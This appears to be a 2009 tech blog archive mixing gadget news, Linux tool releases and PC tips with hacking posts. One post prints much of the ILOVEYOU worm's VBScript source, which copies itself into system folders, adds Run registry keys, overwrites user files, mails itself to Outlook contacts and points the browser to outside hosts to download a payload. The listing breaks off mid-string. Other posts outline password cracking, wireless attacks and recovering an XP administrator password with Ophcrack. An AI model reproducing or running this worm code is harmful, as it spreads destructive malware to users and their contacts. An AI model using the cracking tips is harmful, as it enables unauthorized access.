Monday, May 4, 2009

Samsung Release LED LCD TVs in India

Samsung India announced the introduction of three LED TV Series – 6, 7 and 8 in the Indian market. While the Series 6 and 7 are being launched today in 40" and 46" screen sizes, Series 8 will be available in 55" screen size and will be launched in May’09. These new TVs use LEDs as their primary light source, rather than traditional Cold Cathode Fluorescent Lamps (CCFL). Benefits of using LEDs include ultra-high contrast ratios, slim depths that allow for more artful designs, plus increased energy savings.

Each of the three Samsung LED HDTV Series for 2009 boast Mega contrast ratios, complements of Samsung’s LED TV Engine. Compared to a traditional CCFL, LEDs do produce darker blacks that appear endlessly deep to the eye. They also have a feature called Ultra Clear Panel, which further claims the preservation of every detail even in brightly-lit, imperfect viewing conditions. Samsung’s entire LED HDTV line-up incorporates a number of features to reduce motion blur and image judder.

At just over an inch thick (1.16 inch or 29.9 mm thickness), the sets remain trim without cutting back on connectivity options and include a built in tuner. Also, Samsung created an ultra-slim wall-mount solution – reducing the gap between the TV and the wall to around 0.6 inches, down from the two inches.

With the USB 2.0 movie feature, it will be possible to view videos and photos from a camcorder, play music from a media player or access multimedia files from a portable drive possible. The DLNA Wireless feature in the Series 7 and 8 lets the user seamlessly watch content from the PC without any wires or cables. The Samsung LED TVs comes with a built in Content Library Flash which includes pre loaded content.

While the Series 6 Samsung LED Full High Definition TVs are priced in the range between Rs. 1,25,000(40”) to Rs. 1,50,000(46”), Series 7 LED TVs are priced in the range between Rs.1,40,000 To Rs.1,80,000. Series 8 LED TV will be available in 55” screen size next month priced at Rs.350,000/-.

Sunday, April 26, 2009

App Runner: Run Apps easily on Debian/Ubuntu (Linux)

After almost a week tweaking and preparing this, it is finally out!
Have you have felt frustrated because it is hard to run files on Linux/Ubuntu?
Then App Runner is for you! it is a very small program that can launch any type of program/script (.elf .bin .sh .run .py , etc…)

Installing it is very easy, and it currently is packaged for Debian/Ubuntu (but it should work on any other system with nautilus, get the “source” package and just follow the instructions there: no compiling required!!!)

Homepage: http://hacktolive.org/wiki/App_Runner

Screenshot:
App Runner

App Runner 0.2 released! Run files easily on Linux (Debian/Ubuntu)

New version of App Runner is out: App Runner 0.2!

App Runner is just a small program to easily launch any executable file (.sh, .elf, .bin, .py, etc… ) on Linux (Debian/Ubuntu)

Changelog:
*Dropped “beta” status
*New installer easier to use: everything is now inside the ”.deb” file
*Automatically checks if gnome-terminal is installed, and uses ”xterm” if ”gnome-terminal” is not detected

Note: If you already have an older version, you can install “on top” of that

Homepage/download/screenshots:
http://hacktolive.org/runner


cd2usb 0.5 out

cd2usb 0.5 out

April 26, 2009

cd2usb
New version of the Live USB creator (for Ubuntu and Super OS ) is now out.

New features:

*syslinux updated to version 3.75
*Option to download ISO now updated to be able to download Ubuntu 9.04
*Small tweak to allow cd2usb to run from a CD/DVD (just like the Super OS DVD)

Homepage/download:
hacktolive.org/cd2usb


Super OS 9.04 (the new Super Ubuntu) is now out!

April 26, 200Super OS 9.04

DVD Menu under Windows
Super Ubuntu has just became Super OS!
And the new version (a remaster of Ubuntu 9.04) is now out!

New features:
*New name: Super OS
*Remaster of Ubuntu 9.04
*Many software was updated (OpenOffice, Furius ISO Mount, GParted, Java, Flash, Wine, Firefox, Brasero, Pidgin, GIMP, gufw, Startup Manager, NTFS driver, etc, etc…)
*An official repository is now available (it is now easier to keep your system updated)
*cd2usb is now included on the DVD menu (under Windows)
*apturl support on Opera
*Fixed Ubuntu bug: windows programs weren’t properly associated with wine
*New software: libdvdcss, wine-gecko, App Runner, Gears for Firefox, Moonlight on Opera and on Firefox

Upgrading from Ubuntu and older versions of Super Ubuntu is also possible (but a fresh install is recommended): http://hacktolive.org/wiki/Super_OS_Upgrades

Homepage/download: http://hacktolive.org/os

PS: thanks to all the suggestions for the new name, I had some good ones (that I might even use in the future!), but I went with Super OS to keep it simple. Cheers to all!

Saturday, April 25, 2009

Windows 7 To be Available From April 30th 2009

Windows 7 To be Available From April 30th 2009
By: Abhishek | Apr 25, 2009


Microsoft Corp said on Friday a version of its long awaited Windows 7 Operating System will be made available from next week. The version, known as a 'release candidate', or RC, essentially means the world's largest software company is in the final stages of completing the operating system, the successor to the unpopular Windows Vista.

Microsoft said the RC will be available for download by program developers and IT professionals subscribing to the MSDN and TechNet networks on April 30 and available more broadly on May 5. The company has still not said when the finished version would begin to be installed on PCs or available to buy in shops, but the company's chief financial officer said on Thursday it could be as early as July.

Wednesday, April 22, 2009

Secret Tech Tips From Hassle-Free PC

Turn on Vista's Hidden Check Boxes Feature

Most tech-savvy users know how to select multiple files: Hold down the Ctrl key while clicking each individual file. Of course, that can get a little tricky if you're working with a long list and/or a lot of files: It's too easy to mis-click and "lose" all your selections. That's why I'm loving an undocumented Windows Vista feature: check boxes. Instead of holding down the Ctrl key, you simply click a check box next to each file you want to select.

To enable this handy option, open any system window (like Computer or Explorer), click the Organize menu, and then choose Folder and Search Options. Next, click the View tab, and then scroll down until you see "Use check boxes to select items." Enable it, then click OK.

Presto! Now, whenever you mouse over a file, a check box should appear in the left column. Select multiple files, then drag 'em wherever you want or do whatever else you need to do. Also, note that you can click the "master" check box next to Name to instantly select all the files (as an alternative to the old standby Ctrl-A).

Turn Any MP3 Into an iPhone Ringtone

Back when I was a Palm Centro owner, I used the excellent freeware app MiniTones to turn Brendan Benson's "Spit It Out" into my ringtone. But when I upgraded to an Apple iPhone, I discovered that iTunes charges 99 cents for ringtones--even if you already own the song.

My cheapskate nature doesn't allow for that. (It's not the money, it's the principle of the thing.) So I decided to "roll my own" iPhone ringtone, which turned out to be a fairly easy process.

  1. Start iTunes and find the song you want to convert. (It must be an MP3.)
  2. Right-click the song and choose Get Info.
  3. Click the Options tab.
  4. Check the Start Time and Stop Time boxes, then enter times for each (no more than 30 seconds apart, the maximum length for a ringtone). I used 0:00 and 0:30, respectively, as "Spit It Out" has a perfect ascending lead-in.
  5. Click OK, then right-click the song again and choose Create AAC Version. You should immediately see a new 30-second version of the song.
  6. Drag that version out of iTunes and into the folder of your choice.
  7. Delete the 30-second version from iTunes and change the Start Time/Stop Time back to the original.
  8. Open the folder containing the 30-second AAC file you dragged out of iTunes, then change the file extension from .m4a to .m4r. Double-click it and it immediately gets added to iTunes' ringtone library.
  9. Finally, sync your iPhone. When it's done, you can head into the settings and select your new ringtone.

Tweak Internet Explorer's Default Search Engine

By default, Internet Explorer 7's search box taps Windows Live Search--not the least bit surprising given that the latter is Microsoft's baby. Unfortunately... hmmm, how to put this politely... Windows Live Search bites.

The good news is, there's an easy to tweak Internet Explorer so it uses the search engine of your choice. Like, say, Google. Here's how:

  1. Start Internet Explorer.
  2. Click Tools, Internet Options.
  3. In the General tab, find the Search section and click Settings.
  4. If Google is listed, click it and then click Set Default. If not, click Find more providers, then clickGoogle and follow the instructions. As you'll see, Google is just one of the available options.

That's it! Now, when you click inside IE's search box and type a query, you'll get results from Google--or whatever search provider you set as the default.

Want to change it back? Click the pull-down menu on the right side of the search box and choose Change Search Defaults.

Friday, April 17, 2009

Nokia Launches E75 in India

Nokia Launches E75 in India
By:Abhishek | Apr 15, 2009

Nokia has finally launched one of their latest additions to the E-Series range of business class handsets, the Nokia E75 with Nokia Messaging Service (push email)m, which mobilizes email solutions on Nokia devices. The E75 is the first device from Nokia’s stable that offers complete integration of email and messaging services and provides an easy 3 step process for instant email set up and supports up to 16email accounts.


Speaking at the launch, Vineet Taneja, Marketing Director, Nokia India said, “Business mobility is now a necessity. The prosumers and enterprises in India are fast realizing that mobile business solutions can help provide a competitive advantage. The power-packed Nokia E75 with Nokia Messaging Service is the definite efficiency tool that offers the complete mobile email functionality and gives consumers an enriched and easy to use email experience while on the move. Connecting to and using email now on will be as easy as using SMS giving people the choice of applications they want to use and when they want to use.”


The Nokia E75 boasts full desktop email functionality along with both a standard keypad and a slide out QWERTY keypad. Like the E71 and E66, the E75 also has a tweaked UI that offers two customizable home screen modes for business as well as personal mode. It also displays alerts for up to two email accounts on the home screen, ensures quick navigation and switching between email accounts and displays the first line of the mail under the subject line. The Nokia Messaging Service supports an array of third party email solutions, namely Gmail, Yahoo, Rediffmail, Sify, Indiatimes, Net4, Hotmail and In.com amongst others, thereby providing direct access to over 90 percent of the world's corporate inboxes as well.


The enhanced email UI includes folder and HTML email support, expandable views and sorting capability by date, sender and size, as well as the most commonly used email functions just a single click away. The device supports full integration between contacts, email, home screen and calendar. It provides the ability to create and respond to meeting requests, contacts lookup and auto-complete.

Its other features include -
  • 2.4 inch TFT LCD (240 x 320 pixels)
  • 3.5mm earphone socket
  • MicroSD card support
  • EDGE/GPRS, 3G with HSDPA
  • Wi-Fi
  • GPS with A-GPS support
  • Stereo Bluetooth and USB 2.0 (micro)
  • 3.2MP autofocus camera with LED flash
  • Stereo FM radio
The Nokia E75 will be available at an MRP of Rs. 26, 299 (including an 8GB memory card) in two colors - silver black and red.

Viruses

What is a Computer Virus ?
A potentially damaging computer programme capable of reproducing itself causing great harm to files or other programs without permission or knowledge of the user.
Types of viruses :-

The different types of viruses are as follows-

1) Boot Sector Virus :- Boot sector viruses infect either the master boot record of the hard disk or the floppy drive. The boot record program responsible for the booting of operating system is replaced by the virus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect a computer when it boots up or when it accesses the infected floppy disk in the floppy drive. i.e. Once a system is infected with a boot-sector virus, any non-write-protected disk accessed by this system will become infected.

Examples of boot- sector viruses are Michelangelo and Stoned.

2) File or Program Viruses :- Some files/programs, when executed, load the virus in the memory and perform predefined functions to infect the system. They infect program files with extensions like .EXE, .COM, .BIN, .DRV and .SYS .

Some common file viruses are Sunday, Cascade.

3) Multipartite Viruses :- A multipartite virus is a computer virus that infects multiple different target platforms, and remains recursively infective in each target. It attempts to attack both the boot sector and the executable, or programs, files at the same time. When the virus attaches to the boot sector, it will in turn affect the system’s files, and when the virus attaches to the files, it will in turn infect the boot sector.
This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated.

Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.
Other examples are Invader, Flip, etc.

4) Stealth Viruses :- These viruses are stealthy in nature means it uses various methods for hiding themselves to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection by antivirus. They are somewhat difficult to detect. When an antivirus program tries to detect the virus, the stealth virus feeds the antivirus program a clean image of the file or boot sector.

5) Polymorphic Viruses :- Polymorphic viruses have the ability to mutate implying that they change the viral code known as the signature each time they spread or infect. Thus an antivirus program which is scanning for specific virus codes unable to detect it's presense.

6) Macro Viruses :- A macro virus is a computer virus that "infects" a Microsoft Word or similar application and causes a sequence of actions to be performed automatically when the application is started or something else triggers it. Macro viruses tend to be surprising but relatively harmless.A macro virus is often spread as an e-mail virus. Well-known examples are Concept Virus and Melissa
Worm

.

Coding of i love u worm

Coding of iloveu worm

The ILOVEYOU worm, also known as VBS/Loveletter and Love Bug worm, is a computer worm written in VBScript.

-------------------------------------------------------------------------

Description



The worm arrived in e-mail boxes on May 4, 2000, with the simple subject of "ILOVEYOU" and an attachment "LOVE-LETTER-FOR-YOU.TXT.vbs".



Two aspects of the worm made it effective:



* It relied on social engineering to entice users to open the e-mail and ensure its continued propagation.

* It employed a mechanism — VBScripts — that, while not entirely novel, had not been exploited to such a degree previously to direct attention to their potential, reducing the layers of protection that would have to be navigated for success.



here is the source code of one of the most famous virus the hits cyberspace

--------------------------------------------------------------------

rem barok -loveletter(vbe)

rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group /

Manila,Philippines

---------------------------------------------------------------------

On Error Resume Next

dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow

eq=""

ctr=0

Set fso = CreateObject("Scripting.FileSystemObject")

set file = fso.OpenTextFile(WScript.ScriptFullname,1)

vbscopy=file.ReadAll

main()

sub main()

On Error Resume Next

dim wscr,rr

set wscr=CreateObject("WScript.Shell")

rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Windows Scripting

Host\Settings\Timeout")

if (rr>=1) then

wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting

Host\Settings\Timeout",0,"REG_DWORD"

end if

Set dirwin = fso.GetSpecialFolder(0)

Set dirsystem = fso.GetSpecialFolder(1)

Set dirtemp = fso.GetSpecialFolder(2)

Set c = fso.GetFile(WScript.ScriptFullName)

c.Copy(dirsystem&"\MSKernel32.vbs")

c.Copy(dirwin&"\Win32DLL.vbs")

c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

regruns()

html()

spreadtoemail()

listadriv()

end sub

sub regruns()

On Error Resume Next

Dim num,downread

regcreate

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\MSKernel32

",dirsystem&"\MSKernel32.vbs"

regcreate

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\RunServices\Wi

n32DLL",dirwin&"\Win32DLL.vbs"

downread=""

downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Internet

Explorer\Download Directory")

if (downread="") then

downread="c:\"

end if

if (fileexist(dirsystem&"\WinFAT32.exe")=1) then

Randomize

num = Int((4 * Rnd) + 1)

if num = 1 then

regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start

Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj

w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"

elseif num = 2 then

regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start

Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe

546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"

elseif num = 3 then

regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start

Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm

POhfgER67b3Vbvg/WIN-BUGSFIX.exe"

elseif num = 4 then

regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start

Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh

YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237 461234iuy7thjg/WIN-BUGSFIX

.exe"

end if

end if

if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then

regcreate

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\WIN-BUGSFI

X",downread&"\WIN-BUGSFIX.exe"

regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start

Page","about:blank"

end if

end sub

sub listadriv

On Error Resume Next

Dim d,dc,s

Set dc = fso.Drives

For Each d in dc

If d.DriveType = 2 or d.DriveType=3 Then

folderlist(d.path&"\")

end if

Next

listadriv = s

end sub

sub infectfiles(folderspec)

On Error Resume Next

dim f,f1,fc,ext,ap,mircfname,s,bname,mp3

set f = fso.GetFolder(folderspec)

set fc = f.Files

for each f1 in fc

ext=fso.GetExtensionName(f1.path)

ext=lcase(ext)

s=lcase(f1.name)

if (ext="vbs") or (ext="vbe") then

set ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

ap.close

elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")

or (ext="hta") then

set ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

ap.close

bname=fso.GetBaseName(f1.path)

set cop=fso.GetFile(f1.path)

cop.copy(folderspec&"\"&bname&".vbs")

fso.DeleteFile(f1.path)

elseif(ext="jpg") or (ext="jpeg") then

set ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

ap.close

set cop=fso.GetFile(f1.path)

cop.copy(f1.path&".vbs")

fso.DeleteFile(f1.path)

elseif(ext="mp3") or (ext="mp2") then

set mp3=fso.CreateTextFile(f1.path&".vbs")

mp3.write vbscopy

mp3.close

set att=fso.GetFile(f1.path)

att.attributes=att.attributes+2

end if

if (eq<>folderspec) then

if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or

(s="script.ini") or (s="mirc.hlp") then

set scriptini=fso.CreateTextFile(folderspec&"\script.i ni")

scriptini.WriteLine "[script]"

scriptini.WriteLine ";mIRC Script"

scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,

if mIRC will"

scriptini.WriteLine " corrupt... WINDOWS will affect and will not run

correctly. thanks"

scriptini.WriteLine ";"

scriptini.WriteLine ";Khaled Mardam-Bey"

scriptini.WriteLine ";http://www.mirc.com"

scriptini.WriteLine ";"

scriptini.WriteLine "n0=on 1:JOIN:#:{"

scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"

scriptini.WriteLine "n2= /.dcc send $nick

"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"

scriptini.WriteLine "n3=}"

scriptini.close

eq=folderspec

end if

end if

next

end sub

sub folderlist(folderspec)

On Error Resume Next

dim f,f1,sf

set f = fso.GetFolder(folderspec)

set sf = f.SubFolders

for each f1 in sf

infectfiles(f1.path)

folderlist(f1.path)

next

end sub

sub regcreate(regkey,regvalue)

Set regedit = CreateObject("WScript.Shell")

regedit.RegWrite regkey,regvalue

end sub

function regget(value)

Set regedit = CreateObject("WScript.Shell")

regget=regedit.RegRead(value)

end function

function fileexist(filespec)

On Error Resume Next

dim msg

if (fso.FileExists(filespec)) Then

msg = 0

else

msg = 1

end if

fileexist = msg

end function

function folderexist(folderspec)

On Error Resume Next

dim msg

if (fso.GetFolderExists(folderspec)) then

msg = 0

else

msg = 1

end if

fileexist = msg

end function

sub spreadtoemail()

On Error Resume Next

dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d

set regedit=CreateObject("WScript.Shell")

set out=WScript.CreateObject("Outlook.Application")

set mapi=out.GetNameSpace("MAPI")

for ctrlists=1 to mapi.AddressLists.Count

set a=mapi.AddressLists(ctrlists)

x=1

regv=regedit.RegRead("HKEY_CURRENT_USER\Software\M icrosoft\WAB\"&a)

if (regv="") then

regv=1

end if

if (int(a.AddressEntries.Count)>int(regv)) then

for ctrentries=1 to a.AddressEntries.Count

malead=a.AddressEntries(x)

regad=""

regad=regedit.RegRead("HKEY_CURRENT_USER\Software\ Microsoft\WAB\"&malead)

if (regad="") then

set male=out.CreateItem(0)

male.Recipients.Add(malead)

male.Subject = "ILOVEYOU"

male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."

male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

male.Send

regedit.RegWrite

"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead ,1,"REG_DWORD"

end if

x=x+1

next

regedit.RegWrite

"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count

else

regedit.RegWrite

"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count

end if

next

Set out=Nothing

Set mapi=Nothing

end sub

sub html

On Error Resume Next

dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6

dta1="
NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _

"
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _

"
good...@-@>"&vbcrlf& _

"
ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#

-#,#-#main#-#)@-@ "&vbcrlf& _

"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#

-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _

"

Password cracking

Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.
Most passwords can be cracked by using following techniques :

1) Hashing :- Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords.
One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.
LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.

Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.


2) Guessing :- Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user's personal information.

Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:

* blank (none)
* the word "password", "passcode", "admin" and their derivatives
* the user's name or login name
* the name of their significant other or another person (loved one)
* their birthplace or date of birth
* a pet's name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard layout (eg, the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters.
and so on....

In one survery of MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was.

A password containing both uppercase & lowercase characters, numbers and special characters too; is a strong password and can never be guessed.


Check Your Password Strength



3) Default Passwords :- A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet.

Always disable or change the applications' (both online and offline) default username-password pairs.

4) Brute Force :- If all other techniques failed, then attackers uses brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. As soon as correct password is reached it displays on the screen.This techniques takes extremely long time to complete, but password will surely cracked.

Long is the password, large is the time taken to brute force it.

5) Phishing :- This is the most effective and easily executable password cracking technique which is generally used to crack the passwords of e-mail accounts, and all those accounts where secret information or sensitive personal information is stored by user such as social networking websites, matrimonial websites, etc.
Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as victim click on "enter" or "login" login button this information reaches to the attacker using scripts or online form processors while the user(victim) is redirected to home page of e-mail service provider.

Never give reply to the messages which are demanding for your username-password, urging to be e-mail service provider.

It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security.
However, cracking usually designates a guessing attack.

wireless hacking

Wireless networks broadcast their packets using radio frequency or optical wavelengths. A modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the fly and persuade wireless stations to accept his packets as legitimate.
The step by step procerdure in wireless hacking can be explained with help of different topics as follows:-

1) Stations and Access Points :- A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station.
An access point (AP) is a station that provides frame distribution service to stations associated with it.
The AP itself is typically connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage.

2) Channels :- The stations communicate with each other using radio frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless networks using neighboring channels may interfere with each other.

3) Wired Equivalent Privacy (WEP) :- It is a shared-secret key encryption system used to encrypt packets transmitted between a station and an AP. The WEP algorithm is intended to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the payload of data packets. Management and control frames are always transmitted in the clear. WEP uses the RC4 encryption algorithm.

4) Wireless Network Sniffing :- Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help find the easy kill as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections.

5 ) Passive Scanning :- Scanning is the act of sniffing by tuning to various radio channels of the devices. A passive network scanner instructs the wireless card to listen to each channel for a few messages. This does not reveal the presence of the scanner. An attacker can passively scan without transmitting at all.

6) Detection of SSID :- The attacker can discover the SSID of a network usually by passive scanning because the SSID occurs in the following frame types: Beacon, Probe Requests, Probe Responses, Association Requests, and Reassociation Requests. Recall that management frames are always in the clear, even when WEP is enabled.
When the above methods fail, SSID discovery is done by active scanning

7) Collecting the MAC Addresses :- The attacker gathers legitimate MAC addresses for use later in constructing spoofed frames. The source and destination MAC addresses are always in the clear in all the frames.

8) Collecting the Frames for Cracking WEP :- The goal of an attacker is to discover the WEP shared-secret key. The attacker sniffs a large number of frames An example of a WEP cracking tool is AirSnort ( http://airsnort.shmoo.com ).

9) Detection of the Sniffers :- Detecting the presence of a wireless sniffer, who remains radio-silent, through network security measures is virtually impossible. Once the attacker begins probing (i.e., by injecting packets), the presence and the coordinates of the wireless device can be detected.

10) Wireless Spoofing :- There are well-known attack techniques known as spoofing in both wired and wireless networks. The attacker constructs frames by filling selected fields that contain addresses or identifiers with legitimate looking but non-existent values, or with values that belong to others. The attacker would have collected these legitimate values through sniffing.

11) MAC Address Spoofing :- The attacker generally desires to be hidden. But the probing activity injects frames that are observable by system administrators. The attacker fills the Sender MAC Address field of the injected frames with a spoofed value so that his equipment is not identified.

12) IP spoofing :- Replacing the true IP address of the sender (or, in rare cases, the destination) with a different address is known as IP spoofing. This is a necessary operation in many attacks.

13) Frame Spoofing :- The attacker will inject frames that are valid but whose content is carefully spoofed.

14) Wireless Network Probing :-
The attacker then sends artificially constructed packets to a target that trigger useful responses. This activity is known as probing or active scanning.

15) AP Weaknesses :-
APs have weaknesses that are both due to design mistakes and user interfaces

16) Trojan AP :- An attacker sets up an AP so that the targeted station receives a stronger signal from it than what it receives from a legitimate AP.

17) Denial of Service :- A denial of service (DoS) occurs when a system is not providing services to authorized clients because of resource exhaustion by unauthorized clients. In wireless networks, DoS attacks are difficult to prevent, difficult to stop. An on-going attack and the victim and its clients may not even detect the attacks. The duration of such DoS may range from milliseconds to hours. A DoS attack against an individual station enables session hijacking.

18) Jamming the Air Waves :- A number of consumer appliances such as microwave ovens, baby monitors, and cordless phones operate on the unregulated 2.4GHz radio frequency. An attacker can unleash large amounts of noise using these devices and jam the airwaves so that the signal to noise drops so low, that the wireless LAN ceases to function.

19) War Driving :- Equipped with wireless devices and related tools, and driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks is known as war driving. War-drivers (http://www.wardrive.net) define war driving as “The benign act of locating and logging wireless access points while in motion.” This benign act is of course useful to the attackers.
Regardless of the protocols, wireless networks will remain potentially insecure because an attacker can listen in without gaining physical access.

Tips for Wireless Home Network Security

1) Change Default Administrator Passwords (and Usernames)
2) Turn on (Compatible) WPA / WEP Encryption
3) Change the Default SSID
4) Disable SSID Broadcast
5) Assign Static IP Addresses to Devices
6) Enable MAC Address Filtering
7) Turn Off the Network During Extended Periods of Non-Use
8) Position the Router or Access Point Safely

CRACK ADMINISTRATOR PASSWORD OF XP

Ophcrack is a linux live distro which boots from the CDRom and without altering (even touches nothing) it gives you the passwords of Windows. Download the iso from the following site and make a bootable disc.

http://download.cnet.com/Ophcrack/9241-2094_4-10664547-1.html?tag=uo;uo

Boot from the CDRom and get the password in 2 minutes! Easy!